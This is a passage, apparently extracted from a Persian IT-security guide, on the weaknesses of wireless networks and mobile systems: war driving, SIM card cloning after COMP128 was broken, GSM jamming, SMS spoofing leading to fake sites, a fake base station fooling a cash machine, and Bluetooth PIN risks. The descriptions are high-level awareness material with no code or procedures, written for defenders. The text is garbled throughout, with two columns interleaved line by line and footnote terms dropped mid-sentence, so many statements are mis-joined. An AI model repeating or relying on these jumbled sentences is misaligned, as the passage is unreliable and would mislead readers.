ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ ﺳـﻴﺎﺭ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ 802.11bﺣـﺪﻭﺩ
ﺗﻤــﺎﺱ ﺑــﺎ ﺗﻤــﺎﻡ ﺷــﻤﺎﺭﻩ ﺗﻠﻔﻨﻬــﺎﻱ ﺳــﺎﺯﻣﺎﻥ ﻭ ﻳــﺎﻓﺘﻦ ﺷــﻤﺎﺭﺓ
۳۰۰ﻓﻮﺕ ﺍﺳﺖ .ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮ ﻓـﺮﺩﻱ ﺑـﺎ
ﻣﻮﺩﻡﻫﺎﻱ ﺁﻥ ،ﺟﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ war drivingﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻳـﻦ
ﻣﻔﻬﻮﻡ ﺟﺪﻳﺪ ﻳﻌﻨﻲ ﺟﺴﺘﺠﻮ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ ﺷـﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ
ﺑﻲﺳﻴﻢ ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ،ﻭ ﺿﺒﻂ ﺗﺮﺍﻓﻴـﻚ ﺷـﺒﻜﺔ ﺁﻧﻬـﺎ ﺑـﺎ ۱۵۳ﺍﻳﻦ ﺩﺳﺘﻪﺑﻨﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜـﻲ ﺍﺯ ﺍﻋـﻀﺎﻱ ﻣﺮﻛـﺰ ﺗﺤﻠﻴـﻞ CERT
ﺍﺳﺖ.
ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ .ﺑﻨﺎ ﺑﻪ ﮔﻔﺘـﻪ ﺩﻳـﻮ ﺗﻮﻣـﺎﺱ ١٦١ﺑـﺎﺯﺭﺱ ﺍﺭﺷـﺪ
154 Insertion Attacks
ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ war driving ،FBIﭘﺪﻳﺪﻩﺍﻱ ﺩﺭﺣـﺎﻝ 155 Mobile Access Point
156 Session Hijacking
157 Broadcasting
158 Flooding
159 Encryption
161 Dave Thomas 160 Wired Equivalent Privacy
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٩٠
ﺛﺎﻧﻴﻪ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ .ﭘﻮﺷﺶ GSMﻫﻤﺔ ﻗـﺎﺭﻩﻫـﺎ ﺭﺍ ﺩﺭ ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺗﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ
ﻱ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ۴۰۰ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ،ﺑﻄﻮﺭﻳﻜﻪ ﻓﻨﺎﻭﺭ ﹺ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻫﺴﺘﻨﺪ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﺪ.
ﺧﺪﻣﺎﺕ ﺩﺭ ﺑﻴﺶ ﺍﺯ ۱۷۰ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﺳﺖ .ﺍﻣـﺎ ﺍﻳـﻦ ﺗﻨﻬـﺎ ﺁﻏـﺎﺯ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ
ﺍﻧﻘﻼﺏ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺍﺳﺖ. ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﺑﺒﻴﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤـﻞ ﺗﻨﻬـﺎ ﺩﺭ
ﻣﺤﻘﻘﺎﻥ ﺻﻨﻌﺘﻲ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺗﺎ ﭘﺎﻳﺎﻥ ﺳﺎﻝ ۲۰۰۵ﺩﺭ ﻓﺎﺻﻠﺔ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ
ﺣﺪﻭﺩ ۱،۴ﻣﻴﻠﻴﺎﺭﺩ ﻛﺎﺭﺑﺮ GSMﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺗﻠﻔﻨﻬـﺎﻱ ﺷﻮﻧﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﮔﻤﺎﻥ ﻛﻨﺪ ﻛﻪ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻓﻮﺍﺻـﻠﻲ
GSMﺩﺭ ﺩﺍﺧﻞ ﺧـﻮﺩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻛـﺎﺭﺕ ﻛﻮﭼـﻚ ﻫﻮﺷـﻤﻨﺪ ﺩﻭﺭﺗﺮ ﺍﺯ ﺁﻥ ﻓﺎﺻﻠﻪ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﻧﻴـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﺍﻳـﻦ ﻓـﺮﺽ
ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﺸﺨﺼﺎﺕ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻧـﺎﻡ ﻧﺎﺩﺭﺳﺖ ﺍﺳﺖ .ﺩﺭ ﺣﻘﻴﻘﺖ ﺳﻴﮕﻨﺎﻟﻬﺎ ﺩﺭ ﻃﻮﻝ ﻫﺰﺍﺭﺍﻥ ﻣﺘﺮ -ﺗـﺎ
ﻭﺍﺣﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺸﺘﺮﻱ ) ١٦٣(SIMﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ SIM .ﺑﺎﻳـﺪ ﺟﺎﻳﻲ ﻛﻪ ﭼﻴﺰﻱ ﺁﻧﻬﺎ ﺭﺍ ﻣﻨﺤﺮﻑ ﻳﺎ ﺩﭼـﺎﺭ ﻭﻗﻔـﻪ ﻧﻜﻨـﺪ -ﻗﺎﺑـﻞ
ﺍﺯ ﻣﺸﺨﺼﺎﺕ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺭﻣﺰﻧﮕـﺎﺭﻱﺷـﺪﻩ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺭﻳﺎﻓﺖ ﻫﺴﺘﻨﺪ .ﺩﻟﻴﻞ ﺁﻥ ﺍﺳﺘﺪﻻﻝ ﻏﻠﻂ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺁﻧـﺘﻦ
ﻛﻨﺪ؛ ﻟﺬﺍ ﺑﻪ ﻛﺎﺭﺕ SIMﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﻗﻮﺕ ﻭ ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤـﻞ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺿـﻌﻴﻒ ﺭﺍ
ﻫﻢ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﻓﻨـﺎﻭﺭﻱ GSMﻧﮕـﺎﻩ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺁﻧﺘﻦ ﺧﺎﺭﺟﻲ ،ﻣﻲﺗـﻮﺍﻥ ﺑـﺮﺩ
ﻛﺮﺩ. ﻻ ﺑﮕﻮﻧﻪﺍﻱﺳﻴﮕﻨﺎﻟﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ .ﺑﺨﺶ ﺑﻲﺳﻴﻢ ﺷﺒﻜﻪ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺖ ﻛﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺮﺍﻓﻴﻚ ﺁﻥ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﺑﻪ
ﻧﻘﺎﻁ ﺿﻌﻒ GSM ﭼﻴﺰﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﭘﻴﺪﺍ ﻛﻨﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ
ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺗﻲ ﭼـﻮﻥ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ ،ﺗﻐﻴﻴـﺮ ﭘﻴـﺎﻡ ،ﻳـﺎ ﺍﺭﺳـﺎﻝ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻛﺎﺭﺕ SIM
ﭘﺎﺭﺍﺯﻳﺖ ﻣﻴﺎﻥ ﭘﻴﺎﻡ ،ﺩﺍﺭﺍﻱ ﺿﻌﻒ ﻫﺴﺘﻨﺪ.
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ GSMﺁﻣﺮﻳﻜﺎ ﻭ ﺍﺭﻭﭘﺎ ،ﺭﻭﺵ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺷﺒﻜﻪ
ﻳﻜﺴﺎﻥ ﺍﺳﺖ .ﻛﺎﺭﺗﻬـﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﻗﺎﺑـﻞ ﺟﺎﺑﺠـﺎﻳﻲ ﺩﺭ ﺗﻠﻔﻨﻬـﺎ ﻣﺴﺎﺋﻞ ﻣﺬﻛﻮﺭ ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ
)ﻛﺎﺭﺗﻬﺎﻱ (SIMﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻤﺎﺭﻩﻫـﺎﻱ ﺗﻤـﺎﺱ ،ﺍﻃﻼﻋـﺎﺕ ﺑﻲﺳﻴﻢ ﺭﺍ ﺭﻭﺷﻦ ﻣﻲﻛﻨﻨﺪ .ﻫﺮﻳﻚ ﺍﺯ ﺿﻌﻔﻬﺎﻱ ﻓﻮﻕ ﺭﺍ ﻣﻲﺗﻮﺍﻥ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ،ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺎﻧﺒﻲ ﻣﺜﻞ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺑﻜـﺎﺭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺗﺠﺮﺑﻴـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ،ﻃﺮﺍﺣـﻲ
ﻣﻲﺭﻭﻧﺪ .ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﻛﺎﺭﺗﻬﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣـﻲﺷـﻮﻧﺪ، ﺷﺒﻜﻪ ،ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺻـﺤﻴﺢ
ﺍﻣﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ COMP128ﻛﻪ ﺩﺭ ﺍﻳﻨﻜﺎﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﭘـﻴﺶ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﻭ ﻳـﺎ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩ .ﺁﺧـﺮﻳﻦ
ﺍﻳﻦ ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﻭ ﻟﺬﺍ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﭙﻲﺑﺮﺩﺍﺭﻱ )ﺳـﺎﺧﺖ ﻓﺼﻠﻬﺎﻱ ﺑﺨﺶ ﺳﻮﻡ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑـﺎﺭﺓ ﻧﺤـﻮﺓ ﺍﻣـﻦ ﻛـﺮﺩﻥ
ﻳﻚ ﻧﺴﺨﺔ ﻣﺸﺎﺑﻪ ﺍﺯ ﺧـﻮﺩ( ﺍﻳﻤـﻦ ﻧﻴـﺴﺘﻨﺪ War driving .ﺑـﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ.
ﻣﺸﺘﺮﻛﻴﻦ ﺗﻠﻔﻨﻬـﺎﻱ ﻫﻤـﺮﺍﻩ ﻛـﻪ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ GSMﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﻣﺴﺌﻠﻪ ﺧﻄﺮﻧﺎﻛﻲ ﻧﻴﺴﺖ .ﻣﺴﺘﻘﻞ ﺍﺯ ﻃﻴﻒ ﻓﺮﻛﺎﻧﺴﻲ ،ﺑﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺍﺭﻭﭘﺎGSM : ﺩ.
ﺍﺭﺳﺎﻝ ﭘﺎﺭﺍﺯﻳﺖ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗـﻮﺍﻥ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺗﻠﻔـﻦ ﻫﻤـﺮﺍﻩ ﺭﺍ GSMﮔﺴﺘﺮﺩﻩﺗﺮﻳﻦ ﻭ ﺩﺭﺣﺎﻝ ﺭﺷﺪﺗﺮﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ
ﺩﭼﺎﺭ ﻭﻗﻔﻪ ﻛﺮﺩ .ﻳﻚ ﺭﻭﺵ ﺑﺴﻴﺎﺭ ﻣﻌﺮﻭﻑ ﺑﺮﺍﻱ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ ﺩﻳﺠﻴﺘﺎﻝ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺟﻬﺎﻥ ﺍﺳﺖ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﭼﻴـﺰﻱ
ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﮔﻔﺘﮕﻮﻱ ١٦٤GSMﺩﺭ ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺛﺎﻧﻴﻪ ﻧﺰﺩﻳﻚ ﺑﻪ ۶۰۰ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ GSMﺩﺭ ﺩﻧﻴﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ -
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ. ﺭﻗﻤﻲ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﺳﻮﻡ ﺗﻌـﺪﺍﺩ ﻛـﻞ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺳـﻴﺎﺭﻱ ﻛـﻪ ﺩﺭ
ﺟﻬﺎﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ ١٦٢.ﺍﻳﻦ ﺭﻗﻢ ﺑﺎ ﺳﺮﻋﺖ ﭼﻬﺎﺭ ﻛﺎﺭﺑﺮ ﺟﺪﻳﺪ ﺩﺭ
ﺑﺮﺭﺳﻲ ﺷﺨﺼﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺮﺍﻱ ﻳـﻚ ﻗﻄﻌـﻪ ﭘﻴـﺎﻡ ﻗـﺮﺍﺭﺩﺍﺩﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ GSMﺑﺴﺘﮕﻲ ﺑﻪ ﺷﺮﺍﻳﻂ ﺩﺍﺭﺩ .ﺍﺯ ﻛـﺎﺭﺕ SIM
ﺑﻤﻨﻈﻮﺭ ﺗﻀﻤﻴﻦ ﻛﻞ ﭘﻴـﺎﻡ ﻭ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ ﺧـﺪﻣﺎﺕ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﻣﻲﺗﻮﺍﻥ ﻧﺴﺨﺔ ﺑﺪﻝ ﺍﻳﺠﺎﺩ ﻧﻤـﻮﺩ .ﻧﻔـﻮﺫ ﺑـﻪ ﺁﻥ ﻧﻴـﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﺑﺮﺭﺳﻲ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺛﺒﺖﺷﺪﺓ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺎﺷﺪ. ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﺁﻥ ﺷﻜﺴﺘﻪ ﺷـﺪﻩﺍﻧـﺪ .ﺍﻳـﻦ
ﻣﺸﻜﻞ ﺁﺧﺮ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﻧﺎﺍﻣﻦ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﻣﻜﺎﻟﻤـﺎﺕ ﺗﻠﻔﻨـﻲ
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ GPRS GSMﻧﻴﺰ ﻣﻨﺠﺮ ﺷﻮﺩ.
١٦٩GPRSﻧﻮﻋﻲ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑـﺮ IPﺍﺳـﺖ ﻛـﻪ ﺑﺮﻗـﺮﺍﺭﻱ
ﺩﺭ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﺓ ﻳــﻚ ﺑﺎﻧــﻚ ﺍﺯ ﻓﻨــﺎﻭﺭﻱ GSMﻣــﺸﻜﻼﺕ
ﺍﺗﺼﺎﻝ ﺩﺍﺋﻤﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ .ﻣﺸﻜﻞ ﻋﻤﺪﺓ ﺍﻳﻦ
ﺩﻳﮕﺮﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ
ﻣﻜﺎﻧﻴﺰﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﻮﺯ ﺑﺮﺍﻱ ﺗﻘﺎﺿﺎﻫﺎﻱ WAPﺑﻪ SMS
ﺭﺍﻩ ﺩﻭﺭ ﻧﺘﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻭﺍﻗﻌﻲ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ،
ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﻳﻚ ﺑﺴﺘﺔ SMSﺗﻘﻠﺒﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺗﻠﻔـﻦ
ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﺟﻌﻠﻲ ﻓﺮﻳﺐ ﺩﺍﺩ.
ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﻭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺟﻌﻠﻲ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ ،ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ
ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻧﻔﻮﺫﮔﺮ ﺍﻣﻜﺎﻥ ﻛﻨﺘﺮﻝ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﺍﻧﺠـﺎﻡ
ﻃﻮﺭﻱ ﻓﺮﻳﺐ ﺩﻫﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺮﻡ ﻛﻪ ﮔﻤـﺎﻥ
ﮔﺮﻓﺘﻪ ﺩﺭ ﺁﻥ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺭﺍ ﭘﺪﻳﺪ ﺧﻮﺍﻫﺪ ﺁﻭﺭﺩ.
ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘـﺖ ﺗﻘﻠﺒـﻲ ﺍﺳـﺖ
ﻭﺍﺭﺩ ﻛﻨﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻠﻔﻨﻬﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ GPRSﺩﺍﺭﻧـﺪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ SMS
ﻗﺎﺑﻠﻴﺖ bluetoothﻧﻴﺰ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﻫـﺮ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻗﺎﺑﻠﻴـﺖ ١٦٥
GSMﺧﺪﻣﺎﺕ ﭘﻴﺎﻣﻬﺎﻱ ﻛﻮﺗﺎﻩ ) (SMSﺭﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ.
ﺑﺨﺶ ﺳﻮﻡ
bluetoothﺷﺎﻣﻞ ﻳﻚ ﺁﺩﺭﺱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪ SMSﺩﺭ ﺳﻴﺴﺘﻢ GSMﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺩﺍﺭﺩ ،ﺍﺯ ﺟﻤﻠﻪ
ﻛﺎﺭﺑﺮ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺑﻪ ﻧﻮﻋﻲ ﺑﻪ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ ﺍﻋﻼﻧﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ ،ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ SIMﻣـﺸﺘﺮﻱ ،ﺍﺭﺳـﺎﻝ
ﺍﺭﺗﺒﺎﻁ ﺍﺳﺖ ﻧﻮﻋﻲ ﺍﻋﺘﻤﺎﺩ ﭘﻴﺪﺍ ﻛﻨﺪ .ﻫﻤﻴﻨﻜـﻪ ﺍﻳـﻦ ﺷﻨﺎﺳـﻪ ﺑـﻪ ﭘﻴﺎﻣﻬــﺎﻱ ﻛﻮﺗــﺎﻩ ﻣﺘﻨــﻲ ،ﻭ ﺍﺭﺗﺒــﺎﻁ ﺑــﺎ ﺩﺭﻭﺍﺯﻩﻫــﺎﻱ ﭘــﺴﺖ
ﻳﻚ ﻛﺎﺭﺑﺮ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪ ،ﺑﺎ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﻭ ﺑﺮﺭﺳـﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﻣـﻮﺍﺭﺩ ﻓـﻮﻕ ﺧـﺪﻣﺎﺕ ﭘﺮﻛـﺎﺭﺑﺮﺩﻱ
ﺷﻨﺎﺳﺔ ﺁﻧﻬـﺎ ﻣـﻲ ﺗـﻮﺍﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺿـﺒﻂ ﻧﻤـﻮﺩ .ﺩﺭ
ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺟﺪﻳـﺪﻱ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪ ﺑﻮﺟـﻮﺩ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ bluetoothﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ،ﻳـﻚ ﻣﻲﺁﻭﺭﻧﺪ SMS .ﻧﻮﻋﻲ ﺳﺮﻭﻳﺲ ﺫﺧﻴﺮﻩ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﺳﺖ ﻛﻪ
ﻓﺮﺁﻳﻨﺪ ﻣﻘﺪﺍﺭﺩﻫﻲ ﺍﻭﻟﻴﻪ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺫﺍﺗﹰﺎ ﻧﺎﺍﻣﻦ ﻣﻲﺑﺎﺷﺪ ،ﭼﺮﺍﻛﻪ ﺩﺭ ﺁﻥ ﺗﻤﺎﻡ ﭘﻴﺎﻣﻬﺎ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ
ﺍﺯ ﻳﻚ PINﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﺍﮔﺮﭼﻪ ﺑﺮﺧـﻲ ﺍﺑﺰﺍﺭﻫـﺎ ﺑـﻪ ﺷـﻤﺎ ﻭ ﺭﻣﺰﻧﺸﺪﻩ ﺗﺒﺎﺩﻝ ﻣﻲﺷﻮﻧﺪ ﻭ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺩﺭ ﻣﺮﻛﺰ SMS
ﺍﺟﺎﺯﻩ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺷﻤﺎﺭﺓ PINﺭﺍ ﻣﻲﺩﻫﻨﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ PINﺭﺍ
ﭘﻴﺶ ﺍﺯ ﺍﺭﺳﺎﻝ ﺑﻪ ﻣﻘﺼﺪ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻣﺰﻧﺸﺪﻩ ﺍﺳـﺖ .ﺍﺯ ﺩﻳﮕـﺮ
